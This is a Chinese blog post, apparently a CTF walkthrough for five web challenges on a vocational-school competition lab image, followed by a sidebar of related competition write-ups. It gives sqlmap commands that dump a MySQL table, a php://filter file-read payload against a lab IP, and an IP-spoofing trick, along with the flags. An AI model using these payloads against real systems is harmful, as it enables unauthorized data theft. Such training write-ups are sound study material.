PYsystem003 中职网络安全

最新推荐文章于 2024-01-28 14:29:18 发布
最新推荐文章于 2024-01-28 14:29:18 发布
阅读量2.6k 收藏 10
点赞数 2
分类专栏: 网络空间安全 文章标签: php mysql 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zx66661/article/details/123566941
版权

1ip/1

F12被禁用,有两种解法

解法一:进入第二题,F12,

F12不退,换回第一题

解法二:新建网址,查看网页源代码

Flag{fc35fdc70d5fc69d269883a822c7a53e}

2.ip/2

直接sqlmap –u 网址 –forms –dbs

发现mysql数据库

sqlmap -u 网址--forms -D mysql --tables

sqlmap –u 网址 --forms -D mysql -T 'comehere!!!' --dump

3.ip/3

看到这里在后面添加后缀 robots.txt试一试

4.ip/4

本地用户ip:127.0.0.1

抓包

flag{c71b47723409ac75d3e6b28f78b372ce}

5.ip/5

http://172.16.103.250/5/?file=php://filter/read=convert.base64-encode/resource=index.php

看到flag.php , 修改网址后缀

http://172.16.103.250/5/?file=php://filter/read=convert.base64-encode/resource=flag.php

修改之后会发现第二个base64码,echo 破解 得flag

ctf女师傅
关注
专栏目录
江西省省赛中职网络安全-系统漏洞利用与提权
weixin_48800344的博客
01-05 380
2021年职业院校技能大赛“网络安全”项目 江西省比赛任务书 一、竞赛时间 总计:420分钟 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 A模块 A-1 登录安全加固 180分钟 200分 A-2 Web安全加固(Web) A-3 流量完整性保护与事件监控(Web,Log) A-4 防火墙策略 A-5 Windows操作系统安全配置 A-6 Linux操作系统安全配置 B模块 B-1 系统漏洞利用与提权 400分 B-2 Linux操作系统渗透测试 B-3 应用服务漏洞扫描与利用 B-4 S
河南省第三届职业技能大赛 网络安全(世赛选拔)项目样题
最新发布
Aluxian_的博客
09-03 1265
4.使用 JavaScript 中的方法,对上一个步骤中得到的结果的字符进行操作,将它们用空格分隔、反转顺序,然后再连接起来。5.通过本地PC中渗透测试平台Kali对服务器场景Server2007中的网站进行访问,登录成功后找到页面中的十字星,将十字星中页面内容进行下载,将下载到的文件解密,并将解密后的文件内容作为FLAG提交;4.通过本地PC中渗透测试平台Kali对服务器场景Server2007中的网站进行访问,登录成功后找到页面中的月亮,将月亮中的信息解密,并将解密后的信息作为FLAG提交;
PYsystem0033
ftxyz23的博客
01-28 562
查看到有一个漏洞,我们去找到这个漏洞位置,同样scp上传,如果你的Kali开启了http服务,还可以把源码复制到你的/var/www/html目录下,在msf里用wget下载,由于我的kali没有,就只演示scp了。对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;木马已经上传到了靶机中,打开msf,开启监听,得到会话。2. 通过上述端口访问。
2021江苏中职网络安全任务四:Web安全渗透测试
zx66661的博客
12-29 4673
通过浏览器访问http://靶机服务器IP/1,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;(2分)截图就行 通过浏览器访问http://靶机服务器IP/2,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交 通过浏览器访问http://靶机服务器IP/3,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并...
Python Basic - subprocess模块,让python在主机上执行相应的shell命令
HuangFei
09-25 343
文章目录简介主要的方法run()方法示例一:Popen接口(subprocess的核心)Popen的介绍示例一:创建一个子进程,然后执行一个简单的命令示例运行并结果输出Popen的子方法subprocess.PIPE 简介 subprocess 是一个允许python在主机上运行一个子进程,该子进程可以去与该计算机通过 == “输入” “输出”“错误输出”“管道” ==等与计算机进行交互,并将此子进程获取的命令执行的返回值返回给主进程。总结一句话就是,子进去去执行命令,然后将结果返回给主进程进行进一步的处理
中职网络安全-PYsystem003.img(环境+解析)
m0_46056107的博客
11-25 289
需要环境私信我
中职网络安全操作系统渗透
m0_71635568的博客
11-30 1285
中职网络安全系统漏洞渗透
中职网络空间安全Windows操作系统渗透测试解题
06-05
通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中的当前最高账户管理...通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中回收站内文件的文档内容作为FLAG提交。
2022年全国职业院校技能大赛“网络安全”竞赛试题官方答案
旺仔Sec&blog
06-26 4570
2022年全国职业院校技能大赛网络安全赛项竞赛试题部分任务答案
2021年山东省中职网络安全省赛B模块windows渗透解析
qq_57147160的博客
12-13 6195
B-10任务十:Windows操作系统渗透测试任务环境说明:●服务器场景:Server2(封闭链接)●服务器场景操作系统:Windows7 1.通过本地PC中渗透测试平台Kali对服务器场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交; 首先第一道题目就非常简单,直接使用nmap -sV 版本扫描进行得出flag: Flag:23 2.通过本地PC中渗透测试平台Kali对服务器场景
2021全国职业技能大赛浙江省杭州市“网络空间安全赛项”赛题及赛题解析(超详细)
Aluxian_的博客
12-08 3950
一、项目和任务描述: 假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录和密码策略、流量完整性保护策略、事件监控策略、防火墙策略等多种安全策略来提升服务器系统的网络安全防御能力。 二、服务器环境说明 LOG:日志服务器(Splunk),操作系统为Linux 用户名:root密码:root Web:IIS服务器,操作系统为Windows 用户名:administrator密码:P@ssw0rd
中职网络安全2021年江苏省系统漏洞利用与提权赛题
qq_57147160的博客
12-29 2790
任务二:系统漏洞利用与提权 任务环境说明: 服务器场景:PYsystem0033 服务器场景操作系统:Ubuntu 服务器场景用户名:未知 密码:未知 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口2…,端口n])提交;(1分) 首先第一道题目的思路就是使用nmap来进行扫描: Flag:[21,22,80] 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;(1分) 看到弱.
Linux操作系统渗透
JJH2724719395的博客
04-15 597
linux操作系统渗透
2021年江苏省职业院校技能大赛中职 “网络信息安全”赛项(超详细)
Aluxian_的博客
12-30 2356
2021年中职组“网络空间安全”赛项一.江苏省竞赛任务书二.任务书解析:三.不懂的可以私信博主! 一.江苏省竞赛任务书 一、竞赛时间 8:00—11:00 共计3小时 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第①阶段: 单兵模式系统渗透测试 任务一: 攻击日志分析 任务二: 系统漏洞利用与提权 任务三: 代码审计 任务四: web安全渗透测试 任务五: Linux操作系统渗透测试 任务六: 端口扫描Python渗透测试 备战阶段 休息20分钟 第②阶段: 分组对抗 系统加固 15分钟
2021年江苏省中职组“网络空间安全”赛项
m0_45155797的博客
04-05 194
2021年江苏省中职组“网络空间安全”赛项 镜像名:PYsystem0040 操作有什么问题,麻烦师傅们指出!
2023年网络安全竞赛B模块专项练习题(ALL)
旺仔Sec&blog
06-02 3779
中职网络安全技能竞赛B模块任务汇总合集
2021年中职网络安全“江西省赛题—B-1:系统漏洞利用与提权
weixin_57060854的博客
05-23 4898
B-1:系统漏洞利用与提权 任务环境说明:  服务器场景:PYsystem001  服务器场景操作系统:Ubuntu(显示链接)  服务器用户名:未知 密码:未知 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口2…,端口n])提交; 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交; 利用Kali渗透机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交;
python教程22-导入模块的几种方式、os模块、sys模块、math模块、random模块、datetime模块等的使用
zjl_xiaoliu的博客
10-30 914
python教程_小白入门2020/10/29 学习目标 P135 导入模块的5种方式 #  导入模块的方法 # @author :zhangjiong # 在python里,一个py文件就可以理解为一个模块 # 不是所有的py文件都可以作为模块被导入的 # 要想一个py文件能够被导入,模块的名字必须要遵守命名规则 # python为了便于程序员开发,提供了很多内置模块 # 导入方式1:使用inport + 模块名的方式进行导入(使用的最多的一个导入方式) import time # 导入模块以后,就可
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值